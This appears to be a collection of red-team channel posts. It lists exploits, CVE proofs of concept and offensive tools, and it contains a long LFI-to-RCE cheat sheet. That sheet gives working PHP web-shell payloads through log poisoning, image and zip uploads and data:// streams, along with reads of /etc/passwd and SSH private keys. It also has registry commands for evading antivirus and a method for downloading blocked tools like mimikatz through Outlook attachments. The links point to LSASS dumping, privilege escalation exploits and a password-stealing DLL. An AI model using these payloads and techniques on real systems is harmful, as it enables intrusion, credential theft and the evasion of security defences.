CVE-2021-41277 MetaBase Arbitrary File Read

PoC:
GET /api/geojson?url=file:/etc/passwd HTTP/1.1

#metabase #cve #poc

Microsoft Exchange Server RCE (PoC)

This PoC just pop mspaint.exe on the target, can be use to recognize the signature pattern of a successful attack event

https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398

#exchange #rce #poc

Bypass AV via Change Filenames/Extension

You need to change the files extension:
.eyb files as .exe
.faq files as .dll

Use the following commands:

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.eyb /f /ve /t REG_SZ /d exefile
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.eyb /f /v "Content Type" /t REG_SZ /d "application/x-msdownload"

This can also work on other security solutions and for many other blacklisted techniques.

#av #evasion #extension #file

Windows installer LPE 0day

https://github.com/klinix5/InstallerFileTakeOver

#windows #lpe #0day

DumpNParse

DumpNParse is a tool that will automatically dump LSASS and parse the results.

https://github.com/icyguider/DumpNParse

#lsass #dump #parse

InfoSec BlackFriday Offers

- Books
- Courses
- Services
- Software
- Hardware

https://github.com/0x90n/InfoSec-Black-Friday

#BlackFriday #InfoSec

Picky PPID Spoofing

Parent Process ID (PPID) Spoofing is one of the techniques employed by malware authors to blend in the target system. This is done by making the malicious process look like it was spawned by another process. This helps evade detections that are based on anomalous parent-child process relationships.

https://capt-meelo.github.io//redteam/maldev/2021/11/22/picky-ppid-spoofing.html

#pid #spoofing #redteam #maldev #malware

Clipboard Shellcode Injection

https://gist.github.com/leftp/d89ddc4651a828333d9c0ca5681d1fc8

#clipboard #shellcode #injection #redteam #maldev

pyKerbrute

Use Python to quickly brute force and enumerate valid Active Directory accounts through Kerberos Pre-Authentication (supports Pass-the-Hash)

https://github.com/3gstudent/pyKerbrute

#ad #kerberos #spray

Outlook Attachments

Attackers can compose an email on Outlook (or O365) and attach a file and then use the file's download link to directly download the file. Restricted file types would first need to have their file extension modified (e.g. mimikatz.exe becomes mimikatz.exe.txt) and then upon download the file extension is modified back to the original extension.

1. Compose an email
2. Attach a file (add .txt to the end if it's a restricted file type)
3. Click on the file to download it and grab the link (attachment.outlook.live.net or attachment.office.net)

Link is valid for ~15 minutes.

#outlook #attachments #redteam #phishing

CVE Trends

CVE Trends gathers crowdsourced intel about CVEs from Twitter's filtered stream API and combines it with data from NIST's NVD and GitHub APIs.

https://cvetrends.com

#cve #trends #monitor

4-ZERO-3

Tool to bypass 403/401. This script contain all the possible techniques to do the same.

https://github.com/Dheerajmadhukar/4-ZERO-3

#forbidden #bypass #bugbounty

Hunting for Persistence in Linux

# https://pberba.github.io/security/2021/11/22/linux-threat-hunting-for-persistence-sysmon-auditd-webshell/

# https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/

#blueteam #redteam #DFIR #security

EfsPotato

MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability

https://github.com/zcgonvh/EfsPotato

#potato #seImpersonateprivilege #lpe

CVE-2021-43267 — Linux TIPC (PoC)

An article on how to escalate privileges via the slab-buffer-overflow in the Transparent Inter-Process Communication (TIPC) module.

Reference:
https://haxx.in/posts/pwning-tipc/

PoC:
https://github.com/ohnonoyesyes/CVE-2021-43267

#poc #cve #linux #lpe

Achieving LFI to RCE

1. Apache Log Poisoning

GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>

2. SSH Log Poisoning

ssh '<?php system($_GET['c'])?>'@target.com
/show.php?file=/var/log/auth.log&c=ls

3. SMTP Log Poisoning

telnet target(.)com 25
MAIL FROM:<test@example.com>
RCPT TO:<?php system($_GET['c'])?>
/show.php?file=/var/log/mail.log&c=ls

4. Image Upload

exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
/show.php?file=../img.jpg&c=ls

5. /proc/self/environ

GET /show.php?file=../../proc/self/environ&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>

6. php://filter

Read source code, it may contain sensitive data (username/passwords, private keys etc)->RCE
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php

"php://filter" is case insensitive. Try URL/Double encoding

7. Zip upload

echo "<?php system($_GET['c'])?>" > shell.php
zip shell(.)zip shell.php
mv shell(.)zip shell.jpg
rm shell.php

/show.php?file=zip://shell.jpg%23shell.php

8. data://text/plain

/show.php?file=data://text/plain,<?php echo base64_encode(file_get_contents("index.php"))?>
/show.php?file=data://text/plain,<?php phpinfo()?>
/show.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pO2VjaG8gJ3NoZWxsISc7Pz4=

9. /proc/self/fd/{id}

Include shell in headers (User-Agent, Authorisation, Referrer etc) and access /proc/self/fd/{id}

10. expect://

/show.php?page=expect://ls

11. input://

POST /index.php?page=php://input HTTP/1.1
<?php system('ls')?>

12. RCE via vulnerable assert statement

Vulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!");
Payload: ' and die(system("whoami")) or '

13. Log files

/var/log/apache/{access.log or error.log}
/var/log/apache2/error.log
/usr/local/{apache or apache2}/log/error_log
/var/log/nginx/{access.log or error.log}
/var/log/httpd/error_log

Insert payload via headers (User-Agent, Authorisation, Referrer etc)

14. Via PHP sessions

https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/

15. Via SSH

If ssh is active check which user is being used (/proc/self/status & /etc/passwd) and try to access <HOME>/.ssh/id_rsa

16. vsftpd Log Poisoning

Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log

17. Automation

https://github.com/D35m0nd142/LFISuite

#lfi #rce #cheatsheet

WindowsMDMLPE — CVE-2021-24084

# https://github.com/ohnonoyesyes/CVE-2021-24084

# https://halove23.blogspot.com/2021/06/CVE-2021-24084-Unpatched-ID.html

#mdm #lpe #cve

Winlogon Password Leaking

The flow is:
— user enters password
— winlogon loads mpnotify.exe
— mpnotify opens RPC channel
— winlogon sends pass via RPC
— mpnotify forwards to DLL
— DLL stores it on disk

https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy

#winlogon #password #leak #redteam